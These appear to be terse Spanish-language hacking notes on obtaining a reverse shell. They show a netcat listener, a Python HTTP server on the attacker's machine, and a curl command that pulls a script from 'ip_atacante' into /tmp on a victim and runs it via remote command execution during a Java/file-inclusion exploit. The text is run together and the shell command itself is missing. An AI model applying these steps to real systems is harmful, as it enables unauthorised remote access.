ls nos permite recibir una rever shell
nc -lnvp 4444
- para enviar la revershell desde la maquina victima podemos usar este comando
bash
cuando estamos explotando un java4shell, debido a un localfileinclusion, debemos tener en cuenta que la revershell no debe de ir ejecutarse como comando en el payload, sino que es mejor, crear un archivo con el script y luego ya ejecutarlo con
bash archivo.shuna buena forma seria hacindo uncurl ip_atacantedonde tengamos un server montado con pythonsudo python3 -m http.server 80y luego en el equipo victima haciendo uso del remote command executioncurl ip_atacante -o /tmp/reverseasi datos del archivo se guardan, finalmente con remote command execution ejecutamos el archivo como dije anteriormente
ya tenemos la bash
